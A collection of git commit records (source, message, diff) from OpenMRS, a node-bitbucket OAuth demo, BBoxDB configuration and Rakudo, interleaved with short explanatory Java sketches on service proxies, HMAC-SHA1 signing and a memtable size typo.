org.openmrs.api.GlobalPropertyListener#supportsPropertyName(java.lang.String) */ public boolean supportsPropertyName(String propertyName) { return propertyName.equals(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyByUuid(java.lang.String) */ @Transactional(readOnly = true) public GlobalProperty getGlobalPropertyByUuid(String uuid) { return dao.getGlobalPropertyByUuid(uuid); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyValue(java.lang.String, * java.lang.Object) */ @SuppressWarnings("unchecked") public <T> T getGlobalPropertyValue(String propertyName, T defaultValue) throws APIException { if (defaultValue == null) throw new IllegalArgumentException("The defaultValue argument cannot be null"); String propVal = getGlobalProperty(propertyName); if (!StringUtils.hasLength(propVal)) return defaultValue; try { return (T) defaultValue.getClass().getDeclaredConstructor(String.class).newInstance(propVal); } catch (InstantiationException e) { throw new APIException(defaultValue.getClass().getName() + " is not able to be instantiated with value: " + propVal, e); } catch (NoSuchMethodException e) { throw new APIException(defaultValue.getClass().getName() + " does not have a string constructor", e); } catch (Exception e) { log.error("Unable to turn value '" + propVal + "' into type " + defaultValue.getClass().getName(), e); return defaultValue; } } /** * @see org.openmrs.api.AdministrationService#getSystemInformation() */ @Transactional(readOnly = true) public Map<String, Map<String, String>> getSystemInformation() throws APIException { Map<String, Map<String, String>> systemInfoMap = new LinkedHashMap<String, Map<String, String>>(); systemInfoMap.put("SystemInfo.title.openmrsInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; { put("SystemInfo.OpenMRSInstallation.systemDate", new SimpleDateFormat("yyyy-MM-dd").format(Calendar .getInstance().getTime())); put("SystemInfo.OpenMRSInstallation.systemTime", new SimpleDateFormat("HH:mm:ss").format(Calendar .getInstance().getTime())); 
put("SystemInfo.OpenMRSInstallation.openmrsVersion", OpenmrsConstants.OPENMRS_VERSION); try { put("SystemInfo.hostname", InetAddress.getLocalHost().getCanonicalHostName()); } catch (UnknownHostException e) { put("SystemInfo.hostname", "Unknown host: " + e.getMessage()); } } }); systemInfoMap.put("SystemInfo.title.javaRuntimeEnvironmentInformation", new LinkedHashMap<String, String>() { Properties properties = System.getProperties(); private static final long serialVersionUID = 1L; { put("SystemInfo.JavaRuntimeEnv.operatingSystem", properties.getProperty("os.name")); put("SystemInfo.JavaRuntimeEnv.operatingSystemArch", properties.getProperty("os.arch")); put("SystemInfo.JavaRuntimeEnv.operatingSystemVersion", properties.getProperty("os.version")); put("SystemInfo.JavaRuntimeEnv.javaVersion", properties.getProperty("java.version")); put("SystemInfo.JavaRuntimeEnv.javaVendor", properties.getProperty("java.vendor")); put("SystemInfo.JavaRuntimeEnv.jvmVersion", properties.getProperty("java.vm.version")); put("SystemInfo.JavaRuntimeEnv.jvmVendor", properties.getProperty("java.vm.vendor")); put("SystemInfo.JavaRuntimeEnv.javaRuntimeName", properties.getProperty("java.runtime.name")); put("SystemInfo.JavaRuntimeEnv.javaRuntimeVersion", properties.getProperty("java.runtime.version")); put("SystemInfo.JavaRuntimeEnv.userName", properties.getProperty("user.name")); put("SystemInfo.JavaRuntimeEnv.systemLanguage", properties.getProperty("user.language")); put("SystemInfo.JavaRuntimeEnv.systemTimezone", properties.getProperty("user.timezone")); put("SystemInfo.JavaRuntimeEnv.fileSystemEncoding", properties.getProperty("sun.jnu.encoding")); put("SystemInfo.JavaRuntimeEnv.userDirectory", properties.getProperty("user.dir")); put("SystemInfo.JavaRuntimeEnv.tempDirectory", properties.getProperty("java.io.tmpdir")); } }); systemInfoMap.put("SystemInfo.title.memoryInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; Runtime runtime = Runtime.getRuntime(); { put("SystemInfo.Memory.totalMemory", convertToMegaBytes(runtime.totalMemory())); put("SystemInfo.Memory.freeMemory", convertToMegaBytes(runtime.freeMemory())); put("SystemInfo.Memory.maximumHeapSize", convertToMegaBytes(runtime.maxMemory())); } }); systemInfoMap.put("SystemInfo.title.dataBaseInformation", new LinkedHashMap<String, String>() { Properties properties = Context.getRuntimeProperties(); private static final long serialVersionUID = 1L; { put("SystemInfo.Database.name", OpenmrsConstants.DATABASE_NAME); put("SystemInfo.Database.connectionURL", properties.getProperty("connection.url")); put("SystemInfo.Database.userName", properties.getProperty("connection.username")); put("SystemInfo.Database.driver", properties.getProperty("hibernate.connection.driver_class")); put("SystemInfo.Database.dialect", properties.getProperty("hibernate.dialect")); } }); systemInfoMap.put("SystemInfo.title.moduleInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; { put("SystemInfo.Module.repositoryPath", ModuleUtil.getModuleRepository().getAbsolutePath()); Collection<Module> loadedModules = ModuleFactory.getLoadedModules(); for (Module module : loadedModules) { String moduleInfo = module.getVersion() + " " + (module.isStarted() ? 
"" : Context.getMessageSourceService().getMessage("Module.notStarted")); put(module.getName(), moduleInfo); } } }); return systemInfoMap; } /** * @param bytes to be converted into mega bytes * @return memory in mega bytes */ private String convertToMegaBytes(long bytes) { int ONE_KILO_BYTE = 1024; return String.valueOf(bytes / ONE_KILO_BYTE / ONE_KILO_BYTE) + " MB"; } /** * @see org.openmrs.api.AdministrationService#purgeGlobalProperties(java.util.List) */ @Override public void purgeGlobalProperties(List<GlobalProperty> globalProperties) throws APIException { for (GlobalProperty globalProperty : globalProperties) { Context.getAdministrationService().purgeGlobalProperty(globalProperty); } } /** * @see AdministrationService#getMaximumPropertyLength(Class, String) */ @Override @Transactional(readOnly = true) public int getMaximumPropertyLength(Class<? extends OpenmrsObject> aClass, String fieldName) { return dao.getMaximumPropertyLength(aClass, fieldName); } /** * @see org.openmrs.api.AdministrationService#validate(java.lang.Object, Errors) */ @Override @Transactional(readOnly = true) public void validate(Object object, Errors errors) throws APIException { if (object == null) throw new APIException(Context.getMessageSourceService().getMessage("error.null")); dao.validate(object, errors); } /** * @see org.openmrs.api.AdministrationService#getSearchLocales(org.openmrs.User) */ @Override @Transactional(readOnly = true) public List<Locale> getSearchLocales() throws APIException { Set<Locale> locales = new LinkedHashSet<Locale>(); Locale currentLocale = Context.getLocale(); locales.add(currentLocale); //the currently used full locale //the currently used language locales.add(new Locale(currentLocale.getLanguage())); //add user's proficient locales User user = Context.getAuthenticatedUser(); if (user != null) { List<Locale> proficientLocales = user.getProficientLocales(); if (proficientLocales != null) { locales.addAll(proficientLocales); } } //limit locales to only allowed locales List<Locale> allowedLocales = getAllowedLocales(); if (allowedLocales != null) { Set<Locale> retainLocales = new HashSet<Locale>(); for (Locale allowedLocale : allowedLocales) { retainLocales.add(allowedLocale); retainLocales.add(new Locale(allowedLocale.getLanguage())); } locales.retainAll(retainLocales); } return new ArrayList<Locale>(locales); } @Override public void setImplementationIdHttpClient(HttpClient implementationIdHttpClient) { this.implementationIdHttpClient = implementationIdHttpClient; } }
TRUNK-2218: remove direct method calls in AdministrationServiceImpl class
api/src/main/java/org/openmrs/api/impl/AdministrationServiceImpl.java
TRUNK-2218: remove direct method calls in AdministrationServiceImpl class
<ide><path>pi/src/main/java/org/openmrs/api/impl/AdministrationServiceImpl.java <ide> @Deprecated <ide> @Transactional(readOnly = true) <ide> public List<GlobalProperty> getGlobalProperties() throws APIException { <del> return getAllGlobalProperties(); <add> return Context.getAdministrationService().getAllGlobalProperties(); <ide> } <ide> <ide> /** <ide> */ <ide> @Deprecated <ide> public void deleteGlobalProperty(String propertyName) throws APIException { <del> purgeGlobalProperty(new GlobalProperty(propertyName)); <add> Context.getAdministrationService().purgeGlobalProperty(new GlobalProperty(propertyName)); <ide> } <ide> <ide> /** <ide> * java.lang.String) <ide> */ <ide> public void setGlobalProperty(String propertyName, String propertyValue) throws APIException { <del> GlobalProperty gp = getGlobalPropertyObject(propertyName); <add> GlobalProperty gp = Context.getAdministrationService().getGlobalPropertyObject(propertyName); <ide> if (gp == null) { <ide> gp = new GlobalProperty(); <ide> gp.setProperty(propertyName); <ide> */ <ide> @Transactional(readOnly = true) <ide> public ImplementationId getImplementationId() throws APIException { <del> String property = getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID); <add> String property = Context.getAdministrationService().getGlobalProperty( <add> OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID); <ide> <ide> // fail early if no gp has been defined yet <ide> if (property == null) <ide> // lazy-load the global locale list and initialize with current global property value <ide> if (globalLocaleList == null) { <ide> globalLocaleList = new GlobalLocaleList(); <del> addGlobalPropertyListener(globalLocaleList); <add> Context.getAdministrationService().addGlobalPropertyListener(globalLocaleList); <ide> } <ide> <ide> Set<Locale> allowedLocales = globalLocaleList.getAllowedLocales();
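The TRUNK-2218 change above replaces plain internal calls such as getAllGlobalProperties() with calls routed through Context.getAdministrationService(). The usual reason for this pattern is that the service object handed out by the context is a proxy, so advice such as transaction handling or authorization checks only runs when a call passes through that proxy; a direct internal call would bypass it. The standalone Java sketch below illustrates that difference with a JDK dynamic proxy; the GreetService and ServiceRegistry names are hypothetical and are not OpenMRS classes.

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

// Hypothetical names; a sketch of the proxy-routing idea, not OpenMRS code.
interface GreetService {
    String greet(String name);
    String greetTwice(String name);
}

class GreetServiceImpl implements GreetService {
    public String greet(String name) {
        return "hello " + name;
    }
    public String greetTwice(String name) {
        // Routing the nested call through the registry-held proxy (rather than
        // calling this.greet(name) directly) keeps the proxy's advice applied,
        // which is the point of removing direct method calls in the diff above.
        return ServiceRegistry.getGreetService().greet(name) + " / "
                + ServiceRegistry.getGreetService().greet(name);
    }
}

class ServiceRegistry {
    private static GreetService proxied;

    static void register(final GreetService target) {
        proxied = (GreetService) Proxy.newProxyInstance(
                GreetService.class.getClassLoader(),
                new Class<?>[] { GreetService.class },
                new InvocationHandler() {
                    public Object invoke(Object proxy, Method m, Object[] a) throws Throwable {
                        // Stand-in for transaction or authorization advice.
                        System.out.println("advice around " + m.getName());
                        return m.invoke(target, a);
                    }
                });
    }

    static GreetService getGreetService() {
        return proxied;
    }
}

public class ProxyDemo {
    public static void main(String[] args) {
        ServiceRegistry.register(new GreetServiceImpl());
        // Both nested greet() calls now pass through the advice; a direct
        // this.greet(name) call inside greetTwice() would not.
        System.out.println(ServiceRegistry.getGreetService().greetTwice("world"));
    }
}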
JavaScript
mit
2b82a7ca5ad373d10abc34e242ebfbf4aa3885c0
0
ajaxorg/node-bitbucket
var http = require("http"); var Url = require("url"); var querystring = require("querystring"); var BitBucket = require("../bitbucket").BitBucket; var OAuth = require("oauth").OAuth; var secrets = require("../bitbucket/secrets"); var bitbucket = new BitBucket(true); var repo = bitbucket.getRepoApi(); var PORT = process.env.C9_PORT || 7878; var oauth = new OAuth( "https://bitbucket.org/api/1.0/oauth/request_token/", //requestUrl, "https://bitbucket.org/api/1.0/oauth/access_token/", //accessUrl, secrets.oauth.clientId, //consumerKey, secrets.oauth.secret, //consumerSecret, "1.0", //version, "http://node-bitbucket.fjakobs.c9.io/bitbucket/callback", //authorize_callback, 'HMAC-SHA1' //signatureMethod, ); // for demo purposes use one global access token // in production this has to be stored in a user session var accessToken = ""; function getOAuthRequestToken(callback) { oauth.getOAuthRequestToken(callback) } getOAuthRequestToken(function(error, oauthToken, oauthTokenSecret, results) { console.log(arguments) http.createServer(function(req, res) { var url = Url.parse(req.url); var path = url.pathname; console.log(url); var query = querystring.parse(url.query); if (path == "/") { // redirect to bitbucket if there is no access token if (!accessToken) { res.writeHead(303, { Location: oauth.signUrl("https://bitbucket.org/!api/1.0/oauth/authenticate/", oauthToken, oauthTokenSecret, "GET") }); res.end(); return; } res.writeHead(200); res.end("Jippie"); // TODO use API /* user.show(function(err, user) { if (err) { res.writeHead(err.status); res.end(JSON.stringify(err)); return; } res.writeHead(200); res.end(JSON.stringify(user)); }); */ return; } // URL called by bitbucket after authenticating else if (path.match(/^\/bitbucket\/callback\/?$/)) { // upgrade the code to an access token oauth.getOAuthAccessToken(oauthToken, oauthTokenSecret, query.oauth_verifier, function(err, oauth_access_token, oauth_access_token_secret, results) { if (err) { console.log(err); res.writeHead(500); res.end(err + ""); return; } accessToken = oauth_access_token; // authenticate API bitbucket.authenticateOAuth(accessToken); console.log("accessToken", accessToken) //redirect back res.writeHead(303, { Location: "/" }); res.end(); }); return; } res.writeHead(404); res.end("404 - Not found"); }).listen(PORT, "0.0.0.0"); console.log("listening at http://localhost:" + PORT); });
demo/oauth.js
var http = require("http"); var Url = require("url"); var querystring = require("querystring"); var BitBucket = require("../bitbucket").BitBucket; var OAuth = require("oauth").OAuth; var secrets = require("../bitbucket/secrets"); var bitbucket = new BitBucket(true); var repo = bitbucket.getRepoApi(); var PORT = process.env.C9_PORT || 7878; var oauth = new OAuth( "https://bitbucket.org/api/1.0/oauth/request_token/", //requestUrl, "https://bitbucket.org/api/1.0/oauth/access_token/", //accessUrl, secrets.oauth.clientId, //consumerKey, secrets.oauth.secret, //consumerSecret, "1.0", //version, "http://node-bitbucket.fjakobs.c9.io/bitbucket/callback", //authorize_callback, "HMAC-SHA1" //signatureMethod, ); oauth.getOAuthRequestToken(function(error, oauth_token, oauth_token_secret, results) { console.log(arguments); // for demo purposes use one global access token // in production this has to be stored in a user session var accessToken = ""; http.createServer(function(req, res) { var url = Url.parse(req.url); var path = url.pathname; console.log(url); var query = querystring.parse(url.query); if (path == "/") { // redirect to bitbucket if there is no access token if (!accessToken) { res.writeHead(303, { Location: "https://bitbucket.org/api/1.0/oauth/authenticate?oauth_token=" + oauth_token }); res.end(); return; } // TODO use API /* user.show(function(err, user) { if (err) { res.writeHead(err.status); res.end(JSON.stringify(err)); return; } res.writeHead(200); res.end(JSON.stringify(user)); }); */ return; } // URL called by bitbucket after authenticating else if (path.match(/^\/bitbucket\/callback\/?$/)) { // upgrade the code to an access token oauth.getOAuthAccessToken(oauth_token, oauth_token_secret, oauth.verifier, function(err, oauth_access_token, oauth_access_token_secret, results) { if (err) { console.log(err); res.writeHead(500); res.end(err + ""); return; } accessToken = oauth_access_token; // authenticate API bitbucket.authenticateOAuth(accessToken); //redirect back res.writeHead(303, { Location: "/" }); res.end(); }); return; } res.writeHead(404); res.end("404 - Not found"); }).listen(PORT, "0.0.0.0"); console.log("listening at http://localhost:" + PORT); });
fix oauth
demo/oauth.js
fix oauth
<ide><path>emo/oauth.js <ide> secrets.oauth.secret, //consumerSecret, <ide> "1.0", //version, <ide> "http://node-bitbucket.fjakobs.c9.io/bitbucket/callback", //authorize_callback, <del> "HMAC-SHA1" //signatureMethod, <add> 'HMAC-SHA1' //signatureMethod, <ide> ); <ide> <del>oauth.getOAuthRequestToken(function(error, oauth_token, oauth_token_secret, results) { <del> console.log(arguments); <del> <del> // for demo purposes use one global access token <del> // in production this has to be stored in a user session <del> var accessToken = ""; <add>// for demo purposes use one global access token <add>// in production this has to be stored in a user session <add>var accessToken = ""; <add> <add>function getOAuthRequestToken(callback) { <add> oauth.getOAuthRequestToken(callback) <add>} <add> <add>getOAuthRequestToken(function(error, oauthToken, oauthTokenSecret, results) { <add> console.log(arguments) <ide> <ide> http.createServer(function(req, res) { <ide> var url = Url.parse(req.url); <ide> // redirect to bitbucket if there is no access token <ide> if (!accessToken) { <ide> res.writeHead(303, { <del> Location: "https://bitbucket.org/api/1.0/oauth/authenticate?oauth_token=" + oauth_token <add> Location: oauth.signUrl("https://bitbucket.org/!api/1.0/oauth/authenticate/", oauthToken, oauthTokenSecret, "GET") <ide> }); <ide> res.end(); <ide> return; <ide> } <ide> <add> res.writeHead(200); <add> res.end("Jippie"); <add> <ide> // TODO use API <ide> /* <ide> user.show(function(err, user) { <ide> // URL called by bitbucket after authenticating <ide> else if (path.match(/^\/bitbucket\/callback\/?$/)) { <ide> // upgrade the code to an access token <del> oauth.getOAuthAccessToken(oauth_token, oauth_token_secret, oauth.verifier, function(err, oauth_access_token, oauth_access_token_secret, results) { <add> oauth.getOAuthAccessToken(oauthToken, oauthTokenSecret, query.oauth_verifier, function(err, oauth_access_token, oauth_access_token_secret, results) { <ide> if (err) { <ide> console.log(err); <ide> res.writeHead(500); <ide> <ide> // authenticate API <ide> bitbucket.authenticateOAuth(accessToken); <add> console.log("accessToken", accessToken) <ide> <ide> //redirect back <ide> res.writeHead(303, {
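The oauth demo above delegates request signing to the node "oauth" package with the 'HMAC-SHA1' signature method. As a rough illustration of what that signature involves, the sketch below computes an HMAC-SHA1 over a signature base string with the standard JDK crypto APIs. The base string and secrets are hypothetical placeholders, the real OAuth 1.0 rules for percent-encoding and parameter ordering are omitted, and Java is used here only to keep the added examples in a single language; this is not the library's implementation.

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.util.Base64;

public class HmacSha1Sketch {
    public static void main(String[] args) throws Exception {
        // Hypothetical placeholder values; real OAuth 1.0 builds the base string
        // from the HTTP method plus the percent-encoded URL and sorted parameters.
        String baseString = "GET&https%3A%2F%2Fbitbucket.org%2Fapi&oauth_token%3Dabc";
        String signingKey = "consumerSecret" + "&" + "tokenSecret";

        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(signingKey.getBytes("UTF-8"), "HmacSHA1"));
        String signature = Base64.getEncoder()
                .encodeToString(mac.doFinal(baseString.getBytes("UTF-8")));
        System.out.println("oauth_signature=" + signature);
    }
}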
Java
apache-2.0
9a7fb8ed4c734197cd48571d266ef801c527e936
0
jnidzwetzki/scalephant,jnidzwetzki/bboxdb,jnidzwetzki/bboxdb,jnidzwetzki/bboxdb,jnidzwetzki/scalephant
/******************************************************************************* * * Copyright (C) 2015-2017 the BBoxDB project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *******************************************************************************/ package org.bboxdb; import java.net.InetAddress; import java.net.UnknownHostException; import java.util.Collection; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class BBoxDBConfiguration { /** * The root directory of the application */ protected String rootDirectory = "/tmp/bboxdb_test"; /** * The directory to store data */ protected String dataDirectory = "/tmp/bboxdb_test/data"; /** * The commit log dir */ protected String commitlogDir = "/tmp/bboxdb_test/commitlog"; /** * Number of entries per memtable */ protected int memtableEntriesMax = 10000; /** * Size of the memtable in bytes */ protected int memtableSizeMax = 128 * 1024 * 1014; /** * Start compact thread (can be disabled for tests) */ protected boolean storageRunCompactThread = true; /** * Start flush thread (can be disabled for tests - all data stays in memory) */ protected boolean storageRunMemtableFlushThread = true; /** * The classname of the spatial indexer */ protected String storageSpatialIndexerFactory = "none"; /** * The checkpoint interval */ protected int storageCheckpointInterval = 1800; /** * The port for client requests */ protected int networkListenPort = 50505; /** * The amount of threads to handle client connections */ protected int networkConnectionThreads = 10; /** * The name of the cluster */ protected String clustername; /** * The list of zookeeper nodes */ protected Collection<String> zookeepernodes; /** * The local IP address of this node. The default value is set in the constructor. 
*/ protected String localip = null; /** * The sstable split strategy */ protected String regionSplitStrategy = "org.bboxdb.distribution.regionsplit.WeightBasedSplitStrategy"; /** * The resource placement strategy */ protected String resourcePlacementStrategy = "org.bboxdb.distribution.placement.RandomResourcePlacementStrategy"; /** * The maximum number of entries per SSTable */ protected int sstableMaxEntries = 1000; /** * The Logger */ private final static Logger logger = LoggerFactory.getLogger(BBoxDBConfiguration.class); public BBoxDBConfiguration() { try { localip = InetAddress.getLocalHost().getHostAddress(); } catch (UnknownHostException e) { logger.warn("Unable to determine the local IP adress of this node, please specify 'localip' in the configuration", e); } } public String getRootDirectory() { return rootDirectory; } public void setRootDirectory(final String rootDirectory) { this.rootDirectory = rootDirectory; } public String getDataDirectory() { return dataDirectory; } public void setDataDirectory(final String dataDirectory) { this.dataDirectory = dataDirectory; } public String getCommitlogDir() { return commitlogDir; } public void setCommitlogDir(final String commitlogDir) { this.commitlogDir = commitlogDir; } public int getMemtableEntriesMax() { return memtableEntriesMax; } public void setMemtableEntriesMax(final int memtableEntriesMax) { this.memtableEntriesMax = memtableEntriesMax; } public int getMemtableSizeMax() { return memtableSizeMax; } public void setMemtableSizeMax(final int memtableSizeMax) { this.memtableSizeMax = memtableSizeMax; } public boolean isStorageRunCompactThread() { return storageRunCompactThread; } public void setStorageRunCompactThread(final boolean storageRunCompactThread) { this.storageRunCompactThread = storageRunCompactThread; } public boolean isStorageRunMemtableFlushThread() { return storageRunMemtableFlushThread; } public void setStorageRunMemtableFlushThread( final boolean storageRunMemtableFlushThread) { this.storageRunMemtableFlushThread = storageRunMemtableFlushThread; } public int getNetworkListenPort() { return networkListenPort; } public void setNetworkListenPort(final int networkListenPort) { this.networkListenPort = networkListenPort; } public int getNetworkConnectionThreads() { return networkConnectionThreads; } public void setNetworkConnectionThreads(final int networkConnectionThreads) { this.networkConnectionThreads = networkConnectionThreads; } public String getStorageSpatialIndexerFactory() { return storageSpatialIndexerFactory; } public void setStorageSpatialIndexerFactory(String storageSpatialIndexerFactory) { this.storageSpatialIndexerFactory = storageSpatialIndexerFactory; } public String getClustername() { return clustername; } public void setClustername(final String clustername) { this.clustername = clustername; } public Collection<String> getZookeepernodes() { return zookeepernodes; } public void setZookeepernodes(final Collection<String> zookeepernodes) { this.zookeepernodes = zookeepernodes; } public String getLocalip() { return localip; } public void setLocalip(final String localip) { this.localip = localip; } public int getSstableMaxEntries() { return sstableMaxEntries; } public void setSstableMaxEntries(final int sstableMaxEntries) { this.sstableMaxEntries = sstableMaxEntries; } public String getRegionSplitStrategy() { return regionSplitStrategy; } public void setRegionSplitStrategy(final String regionSplitStrategy) { this.regionSplitStrategy = regionSplitStrategy; } public String getResourcePlacementStrategy() { return 
resourcePlacementStrategy; } public void setResourcePlacementStrategy(final String resourcePlacementStrategy) { this.resourcePlacementStrategy = resourcePlacementStrategy; } public int getStorageCheckpointInterval() { return storageCheckpointInterval; } public void setStorageCheckpointInterval(final int storageCheckpointInterval) { this.storageCheckpointInterval = storageCheckpointInterval; } }
src/main/java/org/bboxdb/BBoxDBConfiguration.java
/******************************************************************************* * * Copyright (C) 2015-2017 the BBoxDB project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *******************************************************************************/ package org.bboxdb; import java.net.InetAddress; import java.net.UnknownHostException; import java.util.Collection; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class BBoxDBConfiguration { /** * The root directory of the application */ protected String rootDirectory = "/tmp/bboxdb_test"; /** * The directory to store data */ protected String dataDirectory = "/tmp/bboxdb_test/data"; /** * The commit log dir */ protected String commitlogDir = "/tmp/bboxdb_test/commitlog"; /** * Number of entries per memtable */ protected int memtableEntriesMax = 10000; /** * Size of the memtable in KB */ protected int memtableSizeMax = 128 * 1024; /** * Start compact thread (can be disabled for tests) */ protected boolean storageRunCompactThread = true; /** * Start flush thread (can be disabled for tests - all data stays in memory) */ protected boolean storageRunMemtableFlushThread = true; /** * The classname of the spatial indexer */ protected String storageSpatialIndexerFactory = "none"; /** * The checkpoint interval */ protected int storageCheckpointInterval = 1800; /** * The port for client requests */ protected int networkListenPort = 50505; /** * The amount of threads to handle client connections */ protected int networkConnectionThreads = 10; /** * The name of the cluster */ protected String clustername; /** * The list of zookeeper nodes */ protected Collection<String> zookeepernodes; /** * The local IP address of this node. The default value is set in the constructor. 
*/ protected String localip = null; /** * The sstable split strategy */ protected String regionSplitStrategy = "org.bboxdb.distribution.regionsplit.WeightBasedSplitStrategy"; /** * The resource placement strategy */ protected String resourcePlacementStrategy = "org.bboxdb.distribution.placement.RandomResourcePlacementStrategy"; /** * The maximum number of entries per SSTable */ protected int sstableMaxEntries = 1000; /** * The Logger */ private final static Logger logger = LoggerFactory.getLogger(BBoxDBConfiguration.class); public BBoxDBConfiguration() { try { localip = InetAddress.getLocalHost().getHostAddress(); } catch (UnknownHostException e) { logger.warn("Unable to determine the local IP adress of this node, please specify 'localip' in the configuration", e); } } public String getRootDirectory() { return rootDirectory; } public void setRootDirectory(final String rootDirectory) { this.rootDirectory = rootDirectory; } public String getDataDirectory() { return dataDirectory; } public void setDataDirectory(final String dataDirectory) { this.dataDirectory = dataDirectory; } public String getCommitlogDir() { return commitlogDir; } public void setCommitlogDir(final String commitlogDir) { this.commitlogDir = commitlogDir; } public int getMemtableEntriesMax() { return memtableEntriesMax; } public void setMemtableEntriesMax(final int memtableEntriesMax) { this.memtableEntriesMax = memtableEntriesMax; } public int getMemtableSizeMax() { return memtableSizeMax; } public void setMemtableSizeMax(final int memtableSizeMax) { this.memtableSizeMax = memtableSizeMax; } public boolean isStorageRunCompactThread() { return storageRunCompactThread; } public void setStorageRunCompactThread(final boolean storageRunCompactThread) { this.storageRunCompactThread = storageRunCompactThread; } public boolean isStorageRunMemtableFlushThread() { return storageRunMemtableFlushThread; } public void setStorageRunMemtableFlushThread( final boolean storageRunMemtableFlushThread) { this.storageRunMemtableFlushThread = storageRunMemtableFlushThread; } public int getNetworkListenPort() { return networkListenPort; } public void setNetworkListenPort(final int networkListenPort) { this.networkListenPort = networkListenPort; } public int getNetworkConnectionThreads() { return networkConnectionThreads; } public void setNetworkConnectionThreads(final int networkConnectionThreads) { this.networkConnectionThreads = networkConnectionThreads; } public String getStorageSpatialIndexerFactory() { return storageSpatialIndexerFactory; } public void setStorageSpatialIndexerFactory(String storageSpatialIndexerFactory) { this.storageSpatialIndexerFactory = storageSpatialIndexerFactory; } public String getClustername() { return clustername; } public void setClustername(final String clustername) { this.clustername = clustername; } public Collection<String> getZookeepernodes() { return zookeepernodes; } public void setZookeepernodes(final Collection<String> zookeepernodes) { this.zookeepernodes = zookeepernodes; } public String getLocalip() { return localip; } public void setLocalip(final String localip) { this.localip = localip; } public int getSstableMaxEntries() { return sstableMaxEntries; } public void setSstableMaxEntries(final int sstableMaxEntries) { this.sstableMaxEntries = sstableMaxEntries; } public String getRegionSplitStrategy() { return regionSplitStrategy; } public void setRegionSplitStrategy(final String regionSplitStrategy) { this.regionSplitStrategy = regionSplitStrategy; } public String getResourcePlacementStrategy() { return 
resourcePlacementStrategy; } public void setResourcePlacementStrategy(final String resourcePlacementStrategy) { this.resourcePlacementStrategy = resourcePlacementStrategy; } public int getStorageCheckpointInterval() { return storageCheckpointInterval; } public void setStorageCheckpointInterval(final int storageCheckpointInterval) { this.storageCheckpointInterval = storageCheckpointInterval; } }
Updated default memtable size
src/main/java/org/bboxdb/BBoxDBConfiguration.java
Updated default memtable size
<ide><path>rc/main/java/org/bboxdb/BBoxDBConfiguration.java <ide> protected int memtableEntriesMax = 10000; <ide> <ide> /** <del> * Size of the memtable in KB <del> */ <del> protected int memtableSizeMax = 128 * 1024; <add> * Size of the memtable in bytes <add> */ <add> protected int memtableSizeMax = 128 * 1024 * 1014; <ide> <ide> /** <ide> * Start compact thread (can be disabled for tests)
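The BBoxDB commit above changes the default memtableSizeMax from a kilobyte count (128 * 1024) to a byte count. One detail worth flagging: the committed expression is 128 * 1024 * 1014, which evaluates to 132,907,008 and falls a little short of an exact 128 MiB (128 * 1024 * 1024 = 134,217,728), so the 1014 factor looks like a typo for 1024 in the committed source. A tiny arithmetic check, assuming nothing beyond plain Java:

public class MemtableSizeCheck {
    public static void main(String[] args) {
        int committed = 128 * 1024 * 1014;   // 132,907,008 bytes, as in the commit above
        int exact128MiB = 128 * 1024 * 1024; // 134,217,728 bytes
        System.out.println(committed + " vs " + exact128MiB);
    }
}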
Java
artistic-2.0
4cdb5585049a142cb22c5bda85b6a2c127b65645
0
tbrowder/rakudo,salortiz/rakudo,rakudo/rakudo,salortiz/rakudo,tbrowder/rakudo,rakudo/rakudo,rakudo/rakudo,MasterDuke17/rakudo,tbrowder/rakudo,salortiz/rakudo,rakudo/rakudo,rakudo/rakudo,salortiz/rakudo,tbrowder/rakudo,MasterDuke17/rakudo,tbrowder/rakudo,salortiz/rakudo,MasterDuke17/rakudo,MasterDuke17/rakudo,MasterDuke17/rakudo,rakudo/rakudo,salortiz/rakudo,tbrowder/rakudo,MasterDuke17/rakudo
package org.raku.rakudo; import java.util.ArrayList; import java.util.Arrays; import java.util.Calendar; import java.util.Comparator; import org.raku.nqp.runtime.*; import org.raku.nqp.sixmodel.*; import org.raku.nqp.sixmodel.reprs.CallCaptureInstance; import org.raku.nqp.sixmodel.reprs.ContextRefInstance; import org.raku.nqp.sixmodel.reprs.NativeRefInstance; import org.raku.nqp.sixmodel.reprs.VMArrayInstance; /** * Contains implementation of nqp:: ops specific to Rakudo */ @SuppressWarnings("unused") public final class RakOps { public static final boolean DEBUG_MODE = false; public static class ThreadExt { public SixModelObject firstPhaserCodeBlock; public ArrayList<CallFrame> prePhaserFrames = new ArrayList<CallFrame>(); public ThreadExt(ThreadContext tc) { } } public static class GlobalExt { public SixModelObject Mu; public SixModelObject Any; public SixModelObject Code; public SixModelObject Routine; public SixModelObject Signature; public SixModelObject Parameter; public SixModelObject Int; public SixModelObject Num; public SixModelObject Str; public SixModelObject List; public SixModelObject IterationBuffer; public SixModelObject Iterable; public SixModelObject Array; public SixModelObject Nil; public SixModelObject Map; public SixModelObject Hash; public SixModelObject Junction; public SixModelObject Scalar; public SixModelObject Capture; public SixModelObject ContainerDescriptor; public SixModelObject False; public SixModelObject True; public SixModelObject AutoThreader; public SixModelObject Positional; public SixModelObject PositionalBindFailover; public SixModelObject Associative; public SixModelObject 